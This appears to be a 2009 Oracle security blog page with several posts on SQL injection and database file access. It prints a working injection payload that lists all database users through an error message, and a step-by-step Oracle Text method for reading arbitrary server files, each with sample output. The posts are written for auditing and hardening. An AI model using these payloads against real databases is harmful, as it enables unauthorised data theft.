8 Feb 2009 von Alexander Kornbrust.

 Daniel Kachakil released an interesting whitepaper about fast data extraction using SQL Injection and XML statements on SQL server and a tool implementing this technique called SFX-SQLI.

The paper describes how to retrieve data from a SQL Server database using SQL Injection and XML. This technique is not new (for me). I am using such techniques in the Oracle environment via xmltransform or stragg since a while. It is possible to retrieve the entire content of a table in a single error message…

More details will be available on the SQL Injection book I am currently writing with some other security researchers…

The tool SFX-SQLI implements the concept for SQL Server.

Here is one of the examples how to export an entire table, e.g. via utl_inaddr. The output is limited to 4000 byte:

or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype(’< ?xml version=”1.0″?> ;
‘)).getstringval() listagg from all_users))–

Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at “SYS.UTL_INADDR”, line 4 ORA-06512: at “SYS.UTL_INADDR”, line 35

Geschrieben in Exploit, SQL Injection | Drucken | Keine Kommentare »

7 Feb 2009 von Alexander Kornbrust.

Chris Gates has published a video where he shows how to attack Oracle with Metasploit from the Shmoocon 09 conference.

Even if the attacks were shown on an outdated version of Oracle (10.1.0.3) it’s good to see that the Oracle support in Metasploit is getting better…

Chris has an interesting blog called carnal0wnage.blogspot.com.

Geschrieben in Exploit, SQL Injection | Drucken | Keine Kommentare »

7 Feb 2009 von Alexander Kornbrust.

Yesterday Pete Finnigan posted an entry “Is it possible to steal data with just ALTER SESSION?” in his blog.

In this blog entry Pete describes various interesting possibilities to dump sensitive information from the database via ALTER SESSION, e.g. library cache, password hashes, …

It’s clear that “alter session” offers many methods to dump data to the file system of the database server but without access to the (trace) file this information would be useless.

Pete talked also about the methods how to get such a trace file from the database server. According to Pete “a lot of” databases where he performed a security audit had utl_file_dir set=* or directory objects to the tracefiles.

It would be interesting to know from Pete’s experience, on how many production systems a user with “alter session” can access the tracefile  without asking the DBA for additional privileges, especially since “alter session” was removed from the CONNECT role in 10g R2? 50% 20% 10% 1%?

I audited several hundred Oracle databases and so far only 5 of them had UTL_FILE_DIR=*. In my experience something less than 1%. At least far away from “a lot”. But probably our customer base has a different kind of database setup.
To steal the data from the server it is necessary to  have to privilege ALTER SESSION plus the right to get data from the file system.
The question is: What is more dangerous?  File Access from the database or the ALTER SESSION privilege?  It is clear that the best solution is to restrict/block both but this is not always possible.

I would vote for restricting/blocking file access because this will close many potential security holes. ALTER SESSION is only 1 problem.

A database with the setting UTL_FILE_DIR=* (btw utl_file_dir deprecated from Oracle since 9.2) has bigger problems than ALTER SESSION.

The important point in this discussion is to know all the different ways how a database user can access the file system of the database server. From my experience most DBAs do not know all documented ways how this can be performed.

I know 3 documented concepts in Oracle how to access the file system from the database.
* UTL_FILE_DIR / Directory Concept
* Java
* Oracle Text

Using these techniques (e.g. UTL_FILE_DIR=*, Java or Oracle Text) a database user can read any files (e.g. .bash_history, oracle password file, data_sources.xml) from the server.

UTL_FILE_DIR / ORACLE DIRECTORY / CREATE ANY DIRECTORY:
This setting / Oracle object / privilege is required to access files. The file access can be done via packages (e.g. dbms_lob, utl_file, dbms_advisor, …), external tables or via a simple SQL statement (XMLTYPE). Especially XMLTYPE is dangerous because this is exploitable from a vulnerable web application without using packages. An example how to do this could be found on my overview page Oracle SQL Injection via Web.

JAVA:
Special java privileges are needed to read files from the operating system.This is not granted to PUBLIC. A sample how this could be done is available here.

ORACLE TEXT:
Most DBAs are not aware of the possibility to read files via Oracle Text. By using the CTXAPP privilege plus a CREATE TABLE it is possible to read files from any directory of the database server.

– create a table
CREATE TABLE files (
id NUMBER PRIMARY KEY,
path VARCHAR(255) UNIQUE,
ot_format VARCHAR(6)
);

– insert the file (or URL!) you want to read into the table
INSERT INTO files VALUES (1, ‘c:\boot.ini’, NULL);
– read the file/url by creating an Oracle Text index
CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context
PARAMETERS (’datastore ctxsys.file_datastore format column ot_format’);

– retrieve the read data from the fulltext index
Select token_text from dr$file_index$i;

Sample Output
TOKEN_TEXT
—————————————————————-
0
1
30
Microsoft
Professional
WINDOWS
Windows
XP
boot
default
disk
Conclusion:

To harden a database there are many steps to perform. Blocking file and OS access is one of the most important steps. That’s why it is necessary for a DBA and also security researcher to know all ways how this could be performed.

The Oracle database is a huge product. If you know additional documented /undocumented ways how to access files do not hesitate to send me an email or to post a comment.

Geschrieben in Oracle Security | Drucken | 1 Kommentar »

5 Feb 2009 von Alexander Kornbrust.

Yesterday Bernardo Damele released the new version 0.6.4.1 of the automatic SQL injection tool. sqlmap supports all databases (including Oracle) and can automatically exploit sql injection vulnerabilities and enumerate database information like usernames, privileges, … or download table content .
The latest changes are available in the changelog.
Here are 2 screenshots from a vulnerable test application (with Oracle 11g).

I also tried to run sqlmap 0.6.4.1 against my test server but this version was not able to find the sql injection.

Update:
Today Bernardo has send me an email that he will release an updated version of sqlmap within the next few weeks.

Geschrieben in Oracle Security | Drucken | Keine Kommentare »